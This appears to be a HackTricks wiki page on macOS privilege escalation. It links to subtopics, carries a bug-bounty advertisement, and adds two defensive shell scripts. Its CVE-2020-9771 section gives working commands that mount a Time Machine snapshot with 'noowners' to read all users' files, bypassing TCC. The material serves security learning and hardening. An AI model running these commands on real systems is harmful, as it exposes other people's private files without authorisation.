hacktricks/macos-hardening/macos-security-and-privilege-escalation
2023-09-20 23:11:26 +00:00

macOS Security & Privilege Escalation

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

HackenProof is home to all crypto bug bounties.

Get rewarded without delays
HackenProof bounties launch only when their customers deposit the reward budget. You'll get the reward after the bug is verified.

Get experience in web3 pentesting
Blockchain protocols and smart contracts are the new Internet! Master web3 security at its rising days.

Become the web3 hacker legend
Gain reputation points with each verified bug and conquer the top of the weekly leaderboard.

Sign up on HackenProof and start earning from your hacks!

{% embed url="https://hackenproof.com/register" %}

Basic MacOS

If you are not familiar with macOS, you should start learning the basics of macOS:

  • Special macOS files & permissions:

{% content-ref url="macos-files-folders-and-binaries/" %} macos-files-folders-and-binaries {% endcontent-ref %}

  • Common macOS users

{% content-ref url="macos-users.md" %} macos-users.md {% endcontent-ref %}

  • AppleFS

{% content-ref url="macos-applefs.md" %} macos-applefs.md {% endcontent-ref %}

  • The architecture of the kernel

{% content-ref url="mac-os-architecture/" %} mac-os-architecture {% endcontent-ref %}

  • Common macOS network services & protocols

{% content-ref url="macos-protocols.md" %} macos-protocols.md {% endcontent-ref %}

MacOS MDM

In companies, macOS systems are very likely to be managed with an MDM. Therefore, from an attacker's perspective it is interesting to know how that works:

{% content-ref url="../macos-red-teaming/macos-mdm/" %} macos-mdm {% endcontent-ref %}

MacOS - Inspecting, Debugging and Fuzzing

{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} macos-apps-inspecting-debugging-and-fuzzing {% endcontent-ref %}

MacOS Security Protections

{% content-ref url="macos-security-protections/" %} macos-security-protections {% endcontent-ref %}

Attack Surface

File Permissions

If a process running as root writes a file that can be controlled by a user, the user could abuse this to escalate privileges.
This could occur in the following situations:

  • File used was already created by a user (owned by the user)
  • File used is writable by the user because of a group
  • File used is inside a directory owned by the user (the user could create the file)
  • File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)

Being able to create a file that is going to be used by root allows a user to take advantage of its content, or even to create symlinks/hardlinks so that it points to another place.
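The following script is an added example (not part of the original page) that, given a path a root process is going to write, reports which of the four situations above lets the current unprivileged user influence that file; it relies only on `ls`, `id` and `awk`, and the helper names are our own:

```shell
#!/bin/sh
# Classify a path that a root process is going to write: can the current
# (unprivileged) user influence it? Exit 0 = controllable, 1 = not.
# Helper names (owner_of, in_group, ...) are this example's own.

owner_of()  { ls -ld "$1" | awk '{print $3}'; }
group_of()  { ls -ld "$1" | awk '{print $4}'; }
mode_of()   { ls -ld "$1" | awk '{print $1}'; }
# True if the current user is a member of group $1.
in_group()  { for g in $(id -Gn); do [ "$g" = "$1" ] && return 0; done; return 1; }
# True if the mode string (e.g. drwxrwxr-x) grants group write (6th char).
group_writable() { case "$(mode_of "$1")" in ?????w*) return 0;; *) return 1;; esac; }

check_root_write_target() {
  path=$1
  me=$(id -un)
  dir=$(dirname "$path")
  if [ -e "$path" ] || [ -L "$path" ]; then
    # A pre-existing symlink is the classic way to redirect root's write.
    [ -L "$path" ] && echo "note: $path is a symlink -> $(readlink "$path")"
    if [ "$(owner_of "$path")" = "$me" ]; then
      echo "owned-by-user: $path"; return 0
    fi
    if group_writable "$path" && in_group "$(group_of "$path")"; then
      echo "group-writable: $path (group $(group_of "$path"))"; return 0
    fi
  fi
  # File absent or not writable: can the user create/replace it in the directory?
  if [ "$(owner_of "$dir")" = "$me" ]; then
    echo "parent-dir-owned-by-user: $dir"; return 0
  fi
  if group_writable "$dir" && in_group "$(group_of "$dir")"; then
    echo "parent-dir-group-writable: $dir (group $(group_of "$dir"))"; return 0
  fi
  echo "not-controllable: $path"; return 1
}

# Usage: sh check.sh /Library/Preferences/some.plist /tmp/some.log ...
for p in "$@"; do check_root_write_target "$p"; done
```

Run it as the unprivileged user against the paths you saw a root process touch (for example with `fs_usage` or an installer's postinstall script) and treat every non-zero-free result as something to fix with correct ownership and modes.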

For this kind of vulnerability, don't forget to check for vulnerable .pkg installers:

{% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} macos-installers-abuse.md {% endcontent-ref %}

Entitlements and Privileges abuse via process abuse

If a process can inject code into another process with higher privileges or entitlements, or contact it to perform privileged actions, it could escalate privileges and bypass defensive measures such as the Sandbox or TCC.

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

File Extension & URL scheme app handlers

Apps registered to handle specific file extensions could be abused, and different applications can be registered to open specific URL schemes (protocols).

{% content-ref url="macos-file-extension-apps.md" %} macos-file-extension-apps.md {% endcontent-ref %}

MacOS Privilege Escalation

CVE-2020-9771 - mount_apfs TCC bypass and privilege escalation

Any user (even unprivileged ones) can create and mount a Time Machine snapshot and access ALL the files of that snapshot.
The only privilege needed is for the application used (like Terminal) to have Full Disk Access (FDA) (kTCCServiceSystemPolicyAllfiles), which needs to be granted by an admin.

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I did it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

A more detailed explanation can be found in the original report.
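As an added defensive check (not part of the original page), the script below scans `mount` output for Time Machine snapshots mounted with `noowners`, which is the condition the trick above relies on. The `snapshot@/dev/diskXsY on /mountpoint (flags)` line layout is assumed from typical macOS `mount` output and the sample lines are constructed, so adjust the pattern if your system prints it differently:

```shell
#!/bin/sh
# Flag APFS Time Machine snapshot mounts that carry the "noowners" option.
# Reads mount(8)-style lines on stdin and prints "<snapshot> <mountpoint>".
# Line layout is an assumption based on typical macOS `mount` output.
find_noowners_snapshot_mounts() {
  grep 'com\.apple\.TimeMachine\.[^ ]* on ' |
    grep 'noowners' |
    sed -E 's/^([^ ]+) on ([^ ]+) \(.*$/\1 \2/'
}

# Constructed sample output (not captured from a real host).
SAMPLE_MOUNTS='/dev/disk1s5s1 on / (apfs, sealed, local, read-only, journaled)
/dev/disk1s1 on /System/Volumes/Data (apfs, local, journaled, nobrowse)
com.apple.TimeMachine.2023-05-29-001751.local@/dev/disk1s1 on /tmp/snap (apfs, local, read-only, noowners, nobrowse)
com.apple.TimeMachine.2023-05-28-120000.local@/dev/disk1s1 on /private/var/snap2 (apfs, local, read-only, nobrowse)'

# Number of suspicious mounts found in the constructed sample.
count_sample_hits() {
  printf '%s\n' "$SAMPLE_MOUNTS" | find_noowners_snapshot_mounts | wc -l | tr -d ' '
}

if [ "${1:-}" = "--live" ]; then
  mount | find_noowners_snapshot_mounts      # check the real host
else
  printf '%s\n' "$SAMPLE_MOUNTS" | find_noowners_snapshot_mounts
fi
```

Pair this with an inventory of which applications hold FDA, since the bypass only works from a process that already has that entitlement.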

Sensitive Information

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}

Linux Privesc

First of all, please note that most of the privilege escalation tricks that affect Linux/Unix will also affect MacOS machines. So see:

{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}

MacOS Defensive Apps
